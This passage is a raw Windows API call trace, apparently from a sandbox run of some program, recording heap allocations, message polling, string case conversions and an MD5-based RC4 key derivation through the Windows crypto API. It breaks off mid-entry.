[0257.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.244] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.245] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.245] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.246] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.246] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.247] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.247] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.249] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0257.250] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.250] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.251] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.251] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.251] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.251] CryptHashData (hHash=0xaa5820, pbData=0x24b13c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0257.253] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.253] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.253] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.254] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.254] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.254] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.254] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.254] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: 